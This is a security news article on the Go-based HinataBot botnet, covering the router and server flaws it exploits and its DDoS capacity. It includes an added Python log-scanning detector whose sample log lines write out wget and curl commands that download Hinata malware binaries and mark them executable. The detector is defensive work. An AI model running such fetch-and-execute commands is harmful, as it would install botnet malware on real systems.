GoLang-Based HinataBot Exploiting Router and Server Flaws

A new botnet named HinataBot, which is based on the Golang programming language, has been found exploiting known vulnerabilities to compromise routers and servers for launching distributed denial-of-service (DDoS) attacks. According to a technical report by Akamai, the botnet’s name is inspired by a character from the anime series Naruto, with filenames like “Hinata-<OS>-<Architecture>.” The malware is distributed through the exploitation of exposed Hadoop YARN servers, Realtek SDK devices (CVE-2014-8361), and Huawei HG532 routers (CVE-2017-17215, CVSS score: 8.8).
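The filename convention above gives defenders something to hunt for in honeypot or web-server logs. The following is an added example, not code from Akamai or the original article. It assumes a log format whose first field is the source address, uses Go's standard OS and architecture target names for the `<OS>` and `<Architecture>` parts, and runs over constructed sample lines.

```python
import re
from urllib.parse import urlparse

# Assumption: the page gives only "Hinata-<OS>-<Architecture>"; these sets are a
# subset of Go's standard GOOS / GOARCH target names.
GOOS = {"aix", "android", "darwin", "dragonfly", "freebsd", "illumos", "linux",
        "netbsd", "openbsd", "plan9", "solaris", "windows"}
GOARCH = {"386", "amd64", "arm", "arm64", "mips", "mipsle", "mips64",
          "mips64le", "ppc64", "ppc64le", "riscv64", "s390x"}
NAME_RE = re.compile(r"^hinata-([a-z0-9]+)-([a-z0-9]+)$", re.IGNORECASE)
URL_RE = re.compile(r'''https?://[^\s'";|&)]+''', re.IGNORECASE)

def classify_name(name):
    """Return (os, arch) if name follows Hinata-<OS>-<Architecture>, else None."""
    m = NAME_RE.match(name)
    if not m:
        return None
    os_name, arch = m.group(1).lower(), m.group(2).lower()
    return (os_name, arch) if os_name in GOOS and arch in GOARCH else None

def scan(lines):
    """Return one hit per URL whose final path segment matches the convention."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        src = line.split(" ", 1)[0]  # first field of the assumed log format
        for url in URL_RE.findall(line):
            basename = urlparse(url).path.rsplit("/", 1)[-1]
            target = classify_name(basename)
            if target:
                hits.append({"line": lineno, "src": src, "url": url,
                             "os": target[0], "arch": target[1]})
    return hits

# Constructed sample lines (documentation-range addresses, not real indicators).
SAMPLE = [
    '198.51.100.7 POST /constructed/api cmd="wget http://203.0.113.9/Hinata-linux-amd64 -O /tmp/h"',
    '198.51.100.8 GET /index.html -',
    '198.51.100.9 POST /constructed/form cmd="curl -O http://203.0.113.9/bins/hinata-linux-mipsle; chmod +x"',
    '198.51.100.10 GET /constructed/ref?u=http://203.0.113.9/hinata-fan-page -',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Checking the OS and architecture parts against known Go targets keeps unrelated names such as `hinata-fan-page` from being flagged. A filename match is only a lead for triage, since the naming can change between builds.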

HinataBot’s threat actors have been active since December 2022, initially using a generic Go-based Mirai variant before developing their custom malware. The malware is still evolving, with newer artifacts found in Akamai’s HTTP and SSH honeypots. HinataBot can contact a command-and-control (C2) server for instructions and initiate attacks on target IP addresses.

The latest version of HinataBot uses HTTP and UDP protocols for DDoS attacks. Tests by Akamai showed that an HTTP flood generated 20,430 HTTP requests, while a UDP flood created 6,733 packets. In a hypothetical real-world attack with 10,000 bots, a UDP flood would peak at over 3.3 terabits per second (Tbps), and an HTTP flood would generate about 27 gigabits per second (Gbps).

Golang is increasingly used in malware such as HinataBot, GoBruteforcer, and KmsdBot. It offers high performance, easy multi-threading, and cross-compilation support, and the complexity of compiled Go binaries complicates reverse engineering. Microsoft’s Azure Network Security Team has highlighted the importance of being proactive and developing a DDoS response strategy as DDoS attacks become more frequent and sophisticated.

Original source: The Hacker News


